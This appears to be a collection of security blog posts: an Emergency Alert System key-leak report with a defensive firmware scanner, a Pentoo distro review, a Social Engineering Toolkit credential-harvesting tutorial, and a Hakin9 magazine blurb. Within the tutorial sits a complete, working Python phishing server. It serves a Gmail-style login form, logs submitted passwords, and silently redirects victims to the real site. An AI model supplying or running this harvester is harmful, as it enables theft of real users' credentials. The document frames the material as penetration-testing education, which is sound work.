Will Emergency Alert Vulnerability lead to new Zombie Attack Warnings?

You are sitting with your best friend watching TV when the shrill warning tone of the Emergency Alert System goes off. As the text scrolls across the screen you wonder whether it could be an approaching storm or, worse, a tornado warning. But not this time.

It is something much better,

A Zombie attack!

But before you pile into your car, grab your girlfriend Liz and head to the Winchester for a nice cold pint to wait for all of this to blow over, like in ‘Shaun of the Dead’, consider that the zombie apocalypse you are being warned about could just be a fake alert posted by a hacker.

This is exactly what happened to TV viewers in Great Falls, Montana back in February. An infomercial was interrupted by the familiar warning tone and an Emergency Alert message stating that “bodies of the dead are rising from their graves and attacking the living“. Viewers were warned, “Do not attempt to approach or apprehend the bodies as they are considered extremely dangerous.”

The warning was fake, of course: someone had gained access to the station’s Emergency Alert System equipment. And it could happen again, as a new security vulnerability has been found in the system.

According to The Register, security “researchers at IOActive have found that systems used to receive and authenticate emergency alert messages are vulnerable to remote attack.”

Apparently a root-level SSH private key for the Linux web application servers used by some alert-system appliances was shipped inside a publicly available firmware update, so anyone who downloaded that update now holds a key that the appliances trust for root login.

“This key allows an attacker to remotely log in over the Internet and manipulate any system function. For example, they could disrupt a station’s ability to transmit and could disseminate false emergency information. For any of these issues to be resolved, we believe that re-engineering needs to be done on the digital alerting system side and firmware updates need to be pushed to all appliances,” said Mike Davis of IOActive.
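The class of defect described above, a private key baked into a firmware image, is easy to check for once the image is unpacked. The script below is an added example, not IOActive’s tooling or any vendor’s code: it walks an extracted firmware root filesystem, flags files carrying a private-key header and any authorized_keys files, and tells you whether the combination amounts to root login material. The directory tree it scans in the demo (build_sample_firmware) is constructed for illustration and does not come from any real appliance.

```python
"""Scan an unpacked firmware root for embedded SSH credentials (added example)."""
import os
import re
import tempfile
from pathlib import Path

# Header lines that open a private key in the common on-disk formats.
PRIVATE_KEY_HEADER = re.compile(
    rb"-----BEGIN (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----"
)

# Keys live in small text files; skip large binaries to keep the scan fast.
MAX_FILE_BYTES = 4 * 1024 * 1024


def find_ssh_secrets(root):
    """Return a sorted list of (kind, relative_path) findings under root.

    kind is "private_key" for any file containing a private-key header and
    "authorized_keys" for a file that grants login to whoever holds the
    matching private key.
    """
    root = Path(root)
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if path.is_symlink() or not path.is_file():
                continue
            rel = path.relative_to(root).as_posix()
            if name == "authorized_keys":
                findings.append(("authorized_keys", rel))
            try:
                if path.stat().st_size > MAX_FILE_BYTES:
                    continue
                data = path.read_bytes()
            except OSError:
                continue
            if PRIVATE_KEY_HEADER.search(data):
                findings.append(("private_key", rel))
    return sorted(findings)


def root_login_material(findings):
    """True when the image ships both a private key and an authorized_keys
    file for root: the situation that lets anyone with the firmware log in."""
    has_private = any(kind == "private_key" for kind, _ in findings)
    has_root_auth = any(kind == "authorized_keys" and rel.startswith("root/.ssh/")
                        for kind, rel in findings)
    return has_private and has_root_auth


def build_sample_firmware():
    """Create a constructed (not real) extracted-firmware tree for the demo."""
    root = Path(tempfile.mkdtemp(prefix="fw_"))
    (root / "root" / ".ssh").mkdir(parents=True)
    (root / "root" / ".ssh" / "authorized_keys").write_text(
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAB vendor-support root@appliance\n")
    (root / "etc" / "ssh").mkdir(parents=True)
    (root / "etc" / "ssh" / "vendor_key").write_text(
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "MIIBOgIBAAJBAKconstructedplaceholderbody\n"   # constructed, not a real key
        "-----END RSA PRIVATE KEY-----\n")
    (root / "usr" / "bin").mkdir(parents=True)
    (root / "usr" / "bin" / "httpd").write_bytes(b"\x7fELF" + b"\x00" * 64)
    return root


if __name__ == "__main__":
    fw = build_sample_firmware()
    for kind, rel in find_ssh_secrets(fw):
        print(f"{kind:16} {rel}")
    print("root login material shipped:", root_login_material(find_ssh_secrets(fw)))
```

Run it against the output directory of whatever unpacker you used on the vendor image; a hit on both a private key and root/.ssh/authorized_keys means every customer who can download the update can log in as root on every appliance that trusts that key.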

Not good, as many people rely heavily on the Emergency Alert System, especially in areas with severe or unpredictable weather.

Until the situation is remedied, if you receive a Zombie Apocalypse warning from the TV, think twice before you grab your shotgun and head down to the cemetery to play Left 4 Dead 2 in real life…

Pentoo 2012, a Penetration Tester’s Distro Based on Gentoo Linux

I’ve never seen Pentoo before, but couldn’t resist taking a peek when I saw it mentioned in the Defcon news briefs floating around. Basically Pentoo is Gentoo Linux with a bunch of security focused tweaks and additions.

I am married to Backtrack and am not interested in switching to another Linux security distro, but Pentoo does look enticing. It is loaded with the tools a pentester would want. A quick look at the application menu shows the programs grouped, Backtrack-style, under headings such as:

  • Analyzer tools
  • Bluetooth
  • Database
  • Exploit
  • Forensics
  • MitM
  • SIP/ VoIP
  • Wireless

Under each group you will find a slew of programs that would make any security guru giddy.

Tools like:

  • MSF Console
  • W3af Console
  • Autopsy
  • Burpsuite
  • Nessus
  • Aircrack-ng
  • Kismet
  • Development Tools
  • and many more…

I really liked Pentoo, but as the developer mentions on his site, it is in Beta form right now. Several times I received errors when clicking on menu items. The project is very interesting though and definitely worth checking out!

Backtrack 5: Harvesting Credentials with the Social Engineering Toolkit

The Social Engineering Toolkit (SET) included with Backtrack 5 is a great way for corporate security staff or penetration testers to test how well their network (and users) would stand up to social engineering attacks. With social engineering and spear phishing attacks on the rise, it is very important to educate your users about these attacks.

In this tutorial I will demonstrate how SET can be used to set up a realistic looking website to harvest e-mail usernames and passwords.

Okay, timeout for a disclaimer: This is for security testing purposes only, never attempt to use any security checks or tools on a network that you do not have the authorization and written permission to do so. Doing so could cost you your job and you could end up in jail.

  1. Obtain Backtrack 5 release 2. You can use the LiveCD version, install it on a new system or run it in a Virtual Machine.
  2. The first thing you will want to do is update both the Metasploit Framework and the Social Engineering Toolkit to make sure you have the latest version. Update both, restart SET and check updates one more time.
  3. From the menu select, number 1 – “Social Engineering Attacks”
  4. Next select “Website Attack Vectors”
  5. Now “Credential Harvester Attack Method”
  6. We now have the option to use a web template that will create a generic website for us to use, we can import a webpage to use, or we can clone any existing website and use that. The included templates are very good, so let’s try one of them. Select number 1, “Web Templates”
  7. As you can see in the picture above, SET comes with templates for several popular sites. Once you select one of the templates (I chose number 2, “Gmail”), you will see a short note about the username and password form fields; just hit “return”. SET will now create a fake website from the template you chose and prepare to harvest any credentials entered on it.

And that is it!

Now if we go to the victim machine and surf to the SET created webpage we will see this:

A Gmail login screen! But wait a minute: take a look at the address bar. An IP address is listed instead of the normal Google Mail address. If a user enters a username and password on this site, the credentials are sent to the SET system and recorded. So as user “Security Joe” enters his credentials, we see this on the Backtrack system:

In the picture above you can see the user’s name, logged as “Security+Joe” (the form-encoded form of “Security Joe”), and the user’s password: P@$$W0Rd!

When you are finished, hit “Control-C” to stop harvesting and view a report of all the sessions that you have captured. The report file will be stored in the SET file directory under Reports. Two reports are created, one in html and one in XML. The picture below shows the html report for this session:

As you can see, unless the user checks the address bar, there is no way to tell that he is on a fake website handing away his login name and password. And since many users reuse the same password on multiple sites, this information could be very valuable to an attacker. That is why it is imperative to educate your users about social engineering attacks and how to defend against them.
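The tutorial above runs SET as a black box. To make clear what the credential harvester actually does behind the menu, here is an added example written for this page, not SET’s own code: a minimal harvester built on the Python standard library. It serves a look-alike login form, records whatever is POSTed to it, and then redirects the victim to the genuine site so that the failed-looking login raises no suspicion. The form field names Email and Passwd, the REAL_SITE target and the sample POST body in the test are assumptions chosen to mirror the Gmail template in the walkthrough; the decoding helper also shows why SET’s report printed “Security+Joe”, and host_is_ip_literal is the address-bar check the text tells users to make. Use it only on systems you are authorized to test.

```python
"""Minimal credential harvester of the kind SET automates (added example)."""
import ipaddress
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Where the victim is bounced after capture so the page "just works".
REAL_SITE = "https://mail.google.com/"   # assumed target for the demo

# Look-alike form; field names mirror the Gmail-style template (assumed).
LOGIN_FORM = """<html><body><h2>Sign in</h2>
<form method="POST" action="/">
  Email: <input name="Email"><br>
  Password: <input name="Passwd" type="password"><br>
  <input type="submit" value="Sign in">
</form></body></html>"""

CAPTURED = []   # one entry per submitted form, written out by write_report()


def parse_credentials(body):
    """Decode an application/x-www-form-urlencoded body into {field: value}.

    Browsers encode a space as '+' and punctuation as %XX; SET logs the raw
    body, which is why its report shows "Security+Joe" for "Security Joe".
    """
    fields = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def record(client_ip, body):
    """Store the raw and decoded submission and return the entry."""
    entry = {"client": client_ip, "raw": body, "fields": parse_credentials(body)}
    CAPTURED.append(entry)
    return entry


def host_is_ip_literal(url):
    """The tell-tale sign from the tutorial: a login page served from a bare IP."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        self.wfile.write(LOGIN_FORM.encode("utf-8"))

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", "replace")
        record(self.client_address[0], body)
        # Bounce to the genuine site; the victim sees a normal login page.
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.end_headers()


def write_report(path):
    """Dump captured sessions as JSON (SET writes HTML and XML reports)."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(CAPTURED, fh, indent=2)
    return len(CAPTURED)


if __name__ == "__main__":
    # Listen on port 80 so the victim can browse to http://<your-ip>/
    HTTPServer(("0.0.0.0", 80), Harvester).serve_forever()
```

Everything the walkthrough shows in screenshots corresponds to a few lines here: the template is LOGIN_FORM, the capture is do_POST plus record, and the report is write_report. The redirect after capture is the part users never notice, which is why the only reliable defence at the user level is the address-bar check.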

Hakin9 Exploiting Software, May Issue – Buffer Overflow

Hakin9 IT Security Magazine has just released its May issue of Exploiting Software, “Buffer Overflow“.

This month’s magazine features the article “Recovering Passwords and Encrypted Data Remotely in Plain Text” written by yours truly. In this article, I talk about recovering remote Windows passwords in plain text using both Mimikatz and WCE.

I also talk about the dangers that online attacks present to file encryption. I show how a Java-based online attack can easily bypass encryption and recover the contents of encrypted files in plain text. Even though a file was protected by whole-disk encryption and the file itself was encrypted by a separate program, I was easily able to remotely read and download it with no problems.

Craig Wright also continues his excellent series with an article on Extending Control: API Hooking. In API hooking, malicious code alters library function calls and returns by replacing the valid function calls with ones of the attacker’s choosing. The article follows on from the previous articles and also covers some of the fundamentals you will need in order to understand the shellcode creation process, how to use Python as a launch platform for your shellcode, and what the various system components are.

The article includes a section on functions and calls, extends DLL injection, and then moves to the actual API hooking process (which will be extended in coming articles). With these skills you will have the foundations for creating shellcode for exploits, and hence an understanding of the process that penetration testers and hackers use in exploiting systems. You will see how it is possible either to create your own exploit code from scratch or to modify existing exploit code, whether to add functionality or to bypass signature-based IDS/IPS filters.

Also in this issue:

  • The Basics Of Buffer Overflow, Fuzzing and Exploitation By Richer Dinelle
  • Exploit a Software with Buffer Overflow Vulnerability and Bypassing ASLR Protection By Ahmed Sherif El-Demrdash
  • Danger of Man in the Middle Attacks to Modern Life By Wong Chon Kit
  • E-mail Spam Filtering and Natural Language Processing By Yufan Guo
  • Security Communication and Why You Should Trundle By Dean Bushmiller
  • Overriding Function Calls in Linux By Umair Manzoor

Check it out!